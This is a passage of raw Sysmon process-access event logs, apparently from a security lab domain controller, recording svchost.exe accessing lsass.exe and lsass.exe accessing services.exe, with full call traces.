C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 